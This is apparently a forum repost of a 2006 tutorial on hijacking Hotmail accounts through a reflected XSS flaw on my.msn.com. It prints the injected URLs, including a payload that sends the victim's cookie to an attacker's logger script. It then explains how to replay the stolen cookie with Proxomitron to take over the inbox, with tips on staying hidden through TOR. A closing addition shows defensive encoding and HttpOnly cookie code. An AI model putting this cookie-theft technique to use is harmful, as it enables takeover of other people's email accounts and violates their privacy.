
a *fresh* (m$) live exploit



This has been discovered by a 16-year-old Dutch kid ...

origin: his site -> http://adriaangraas.feetback.nl/browse.php...ploits/hotmail/

Hacking Hotmail through XSS

by Adriaan Graas

24 June 2006


That Microsoft's code is not always secure is made very clear again by this XSS exploit. This is not the first XSS exploit that has been found; others have been found. If you are viewing this document offline, the newest version can be found here. I am Adriaan Graas, a student who is interested in internet security and web development. I am currently 16 years old, though that would not make the exploit less effective.

Please do not mail me for hacking your ex-girlfriend's inbox. Get away, moron.


The idea is simple. When you are logged in to Hotmail, a cookie is created which allows you access every time you are in its domain. Since the cookie is not IP-bound (how is this possible? - Microsoft) we are able to fake the cookie, once stolen, and then use it to log in. This all means that we do not have to know the password or even the email address of the victim. Through XSS we can insert a piece of JavaScript code that will send the cookie to a webserver with a log script. This can be written in PHP, ASP, CGI, practically anything you want. The cookie can be faked with Proxomitron.


This is like 50% based on pure luck, or you have a really awful amount of time to spend. Software has been written for auto-searching XSS exploits. Don't use it - it is crap; clear thinking is enough.

When searching, keep these points in mind:

* The page you are searching on must be in the domain which is specified in the cookie. On the pages with 'Logout' buttons in Hotmail, you are using that cookie. I would recommend adding a bookmark that displays your cookie, like javascript:alert(document.cookie);.

* You can use practically any browser, though I'd recommend Mozilla Firefox. It is stable, secure, and available on almost any OS. Use Opera or Internet Explorer - these are OK too - if you like them better. A good point of Opera is that it lets you manage your own cookies.

* If you want to be stealthy, use TOR or a proxy. Though DNS leaking is still dangerous.

Ok. It took me 4 to 5 hours to find three exploits. I will discuss one only.

After having a short look at the cookie, I decided to just start the search. Except for your security, no other preparations are needed. Focus on URLs with GET variables - they are often vulnerable. And, when you have opened a new page, check if your cookie is still equal to Hotmail's login page cookie. Start replacing the GET variables in the URL one by one. Reload the page and view the page source. Check in the source if there are also images or URLs which contain GET variables; you might be able to exploit these. If your replaced variable is there, try to make it in a way that it ends valid HTML/JavaScript and can display you an error. Often special characters are escaped. A nice all-round variable is something like hya"'><)(ho.


The normal URL

http://my.msn.com/newmodule.armx?tok=TVJmH...amp;page=1& m=&col=1&tab=3

The test URL

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"'><ho&col=1&tab=3

A ctrl+f in the source for hya gave the invalid input.

<input type="hidden" name="m" value="hya"'><ho" />

To alert the cookie, it needs to be like this. Fortunately special characters were not escaped.

<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />

The exploited URL

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3


I assume you have the knowledge to at least figure things out yourself, so I am not going too much into details. In the last examples the cookie was alerted by JavaScript. We need the cookie to be sent to a webserver, and there it needs to be logged. I assume you know how to create a logging file. Replace my code by your file where needed. This is the edited URL so it sends the cookie to a webserver.

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)</script><br class="ho&col=1&tab=3

This is the link the victim should click. As soon as he clicks it, his cookie is sent to your server and saved in your logfile. You can display some innocent error or redirect to another page. Next, get Proxomitron. Configure your browser to use it. Fire up Proxomitron, go to headers, and fill in the cookie data from your logfile into a fake cookie header (there is one by default). Make sure you have checked the 'out' box. Go to http://my.msn.com/. The inbox of your victim is all yours. If this does not work immediately, a cookie is not made yet. Just go to http://my.msn.com/ again.
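
A defender's view of the flaw described in the post above, as an added example that is not part of the original post or of the affected site's code: the unencoded `m` value rendered into the hidden input, next to an attribute-encoded version and a session cookie marked `HttpOnly` so that `document.cookie` cannot read it. All function names and the cookie name are hypothetical; the probe string is the one quoted in the post.

```javascript
// Added example: function names are hypothetical, not taken from the affected site.

// Pattern the post describes: the "m" GET value is concatenated into a
// double-quoted attribute with no encoding, so a '"' ends the attribute early.
function renderHiddenInputUnsafe(m) {
  return '<input type="hidden" name="m" value="' + m + '" />';
}

// Encode every character that can close the attribute value or open a tag.
const ATTR_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ENTITIES[ch]);
}

// Hardened rendering: same markup, but the value is attribute-encoded.
function renderHiddenInputSafe(m) {
  return '<input type="hidden" name="m" value="' + escapeAttr(m) + '" />';
}

// Regression check for templates: the output must still be exactly one
// <input> element whose value contains no raw quote or angle bracket.
function staysInsideAttribute(html) {
  return /^<input type="hidden" name="m" value="[^"<>]*" \/>$/.test(html);
}

// Session cookie header: HttpOnly hides the cookie from document.cookie,
// Secure keeps it off plain-HTTP requests. The token value is a placeholder.
function sessionCookieHeader(name, token) {
  return `${name}=${token}; Path=/; Secure; HttpOnly`;
}

// The probe string quoted in the post, run through both renderers.
const probe = 'hya"\'><)(ho';
console.log(renderHiddenInputUnsafe(probe), staysInsideAttribute(renderHiddenInputUnsafe(probe)));
console.log(renderHiddenInputSafe(probe), staysInsideAttribute(renderHiddenInputSafe(probe)));
console.log(sessionCookieHeader('sid', 'PLACEHOLDER_TOKEN'));
```

Encoding fixes the injection point itself; `HttpOnly` only limits what a script can read if another injection point is missed.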
